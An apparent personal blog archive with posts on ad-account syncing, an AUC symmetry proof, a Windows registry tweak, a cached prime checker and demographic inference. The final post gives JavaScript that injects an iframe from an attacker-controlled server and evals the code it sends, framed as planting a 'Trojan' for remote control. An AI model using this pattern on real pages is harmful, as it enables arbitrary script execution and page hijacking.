2015年12月31日星期四

A command line tool to sync your AdWords account to your BingAds


In my dream, it will be a cloud based application. You can use your phone to manage the update: control how to sync your campaigns from AdWords to BingAds. Workflows:

config: grant access to 2 networks. trigger full sync and rebuild id map (required before the first sync). how to automatically resolve conflict by entity type by attribute. skip and ignore, skip and notify, take suggestion

recent conflict report: (duplicate conflict should be detected and removed): ignore once (resolve manually by yourself later), take suggestion...checkbox: remember option

historical sync report. what has been updated on g, what has been synced/skipped to bingads, over the time, statistics

Just a dream of adops.

2013年12月29日星期日

Fwd: An interesting property of AUC

Get definition of AUC here


Property: if you flip ground truth only, or flip prediction only, you will get 1-original AUC as new AUC.

Proof:
Take original ROC curve as function of moving score threshold (x(s),y(s))=(fp(s)/N, tp(s)/P)
Where fp(s) is false positive=number of cases predicted as positive under score threshold s but actually negative.
tp(s) is true postive=number of cases predicted as positive and actually also positive.
N is number of negative cases and P is number of positive cases.

1. Flip ground truth only
You will get P'=N and N'=P. Note that prediction is kept unchanged, so fp'(s)=tp(s), tp'(s)=fp(s).
As a result, (x'(s),y'(s))=(y(s),x(s)), which means the two curves are symmetric to line y=x.
So, the area a is the same as area c.
Note that a+b+c=1, so a+(a+b)=1 where a and a+b are AUC before and after ground truth flip.

2. Flip prediction only
You will get N'=N, P'=P, fp'(s)=N-fp(s) and tp'(s)=P-tp(s). 
As a result, (x'(s),y'(s))=(1-x(s), 1-y(s)), which means the cuve flip according to line x=1/2 and then flip according to line y=1/2.
Note that the flip horizontal never change the area under the curve.
while flip vertical make the curve top down, that is to say, the area under the new curve is the area above the original curve.
So AUC+AUC'=1.
#



    

2013年12月2日星期一

Fwd: Copy path in context menu



Copy, save and click to add into regedit.

 

 

Add Copy as Path Option.reg

-----------

 

 

Windows Registry Editor Version 5.00

 

;Created by Vishal Gupta for AskVG.com

 

[HKEY_CLASSES_ROOT\*\shell\Copy Full Path]

 

[HKEY_CLASSES_ROOT\*\shell\Copy Full Path\command]

@="cmd.exe /c echo %1|clip"

 

 

[HKEY_CLASSES_ROOT\*\shell\Copy Filename]

 

[HKEY_CLASSES_ROOT\*\shell\Copy Filename\command]

@="cmd /c for %%i in (\"%1\") do @echo %%~nxi | clip"

 

 

[HKEY_CLASSES_ROOT\*\shell\Copy Dir Path]

 

[HKEY_CLASSES_ROOT\*\shell\Copy Dir Path\command]

@="cmd /c for %%i in (\"%1\") do @echo %%~dpi | clip"

 

 

[HKEY_CLASSES_ROOT\Directory\shell\Copy Dir Path]

 

[HKEY_CLASSES_ROOT\Directory\shell\Copy Dir Path\command]

@="cmd.exe /c echo %1|clip"

 

=======

 

Remove Copy as Path Option.reg

----------

 

Windows Registry Editor Version 5.00

 

;Created by Vishal Gupta for AskVG.com

 

[-HKEY_CLASSES_ROOT\*\shell\Copy Full Path]

 

[-HKEY_CLASSES_ROOT\*\shell\Copy Filename]

 

[-HKEY_CLASSES_ROOT\*\shell\Copy Dir Path]

 

[-HKEY_CLASSES_ROOT\Directory\shell\Copy Dir Path]

 

 

 

 

 

=======

 

 

Enjoy~

 


2013年6月24日星期一

Prime Checker With Cache

如果需要频繁检查某个数是否是素数,可以把查过的素数缓存下来。
 
 

class PrimeCheckerWithCache:
 def __init__(self):
  self.primeSet=set([2,3])
  self.maxTested=4
 def isPrim(self, test):
  #cache hit
  if test<=self.maxTested:
   return test in self.primeSet
  #test and update cache
  for i in range(self.maxTested+1,test+1):
   if not any([i%p==0 for p in self.primeSet]):
    self.primeSet.add(i)
  self.maxTested=test
  return test in self.primeSet 
 
 
正确性证明:
不变量:primeSet中是不超过maxTested的全部素数。
初始:手动设置,成立。
保持:注意到,每次加入primeSet的,总是不能被任何已知素数整除的最小的自然数,也就是primeSet之外最小的素数。因此不变量保持。

因为素数密度很小,所以都缓存下来在规模较小时是可行的。

关于素数密度(不超过n的素数个数/n),我最近学习到有一些有意思的事实
1、素数无穷多
2、素数的密度收敛到0
3、素数的密度比平方数大:)呵呵没想到吧

2013年6月2日星期日

Demographic prediction over aggregated data set

Sometimes you may have no explicit demographic data you desired, P(D|C), where C is the content (page/video/game or whatever you offer) the visitor is consuming and D is the visitor demographic bucket, but you can get some aggregated report from third party, in this schema: P(A,D), here A is the advertisement.
If you own the ad system, you can know P(A|C) because you know where does each ad target. Even if advertisers didn't explicityly target on any content, and you are optimizting for advertiser, you can simulate so as to get P(A|C).
For a fixed demographic bucket, D, we have a linear equation:
P(A|D)=SUM{P(A|C)*P(C|D), foreach C}
We can solve (approximately) P(C|D) using least square.
Finally, we calculate P(D|C) propotional to P(C|D)P(D).
 
To evaluate if the model works, you can use April data to train a model P(C|D), and then predict P(A|D) for May, and compare it to the truth report P(A,D). Here we assume P(D) and P(C|D) is relatively stable over time, while advertisements booked in the system change frequently.
 
A trouble might be that the content in your network also change frequently, then you have to generalize your content from specific item, such as page URL to page content topic or video id to series.
 
Summarize the idea:
Audience has some demographic property and as a result, he/she is interested in some topic of content. As he/she is consuming some content, some ad is shown to him and you get a ad-demo distribution report. The model above is trying to address the connection between demographic and content topic.

2013年4月5日星期五

use window.postMessage to hack a page

Just wondering to if I can ingest a Trojan into a page, and my server can control the client to run any javascript. Here I get a solution: https://developer.mozilla.org/en-US/docs/DOM/window.postMessage
 
Type F12 in Chrome and paste the following js code in Console:
 
//inject iframe window
var body = document.getElementsByTagName('body' )[0];
var iframe = document.createElement('iframe' );
iframe.id = "proxy_iframe";
iframe.src = 'http://localhost:24189/';
body.appendChild(iframe);

//register callback
function receiveMessage(event) {
    eval( "("+event.data+ ")();" );
}
window.addEventListener( "message", receiveMessage, false);

//invoke
window.setTimeout( function() {
    iframe.contentWindow.postMessage( "0" , "*" );
}, 1000);
 
Replace localhost:24189 to the server you can control.
 
On server you can response a HTML like this:
 
< html>
    <head >
        < title> Proxy</ title >
        < script>
            //return a function to exec in host
            function loop(args) {
                return function () {
                    function crawl(url) {
                        alert(url);
                    }
                    crawl(( new Date()).toString());
                    window.setTimeout( function () {
                        iframe.contentWindow.postMessage( "0" , "*" );
                    }, 1000);
                };
            }

            window.onload = function() {

                function receiveMessage(event) {
                    event.source.postMessage(loop(event.data).toString(), event.origin);
                }

                window.addEventListener( "message" , receiveMessage, false );
            };
        </ script></ head ><body ></ body>
</ html>
The magic here is you can serialize a function as a string from your server to the host page, and run the script in the host page. Don't forget, in the end of the function, to use window.setTimeout to let the host page find more jobs from your server later XD.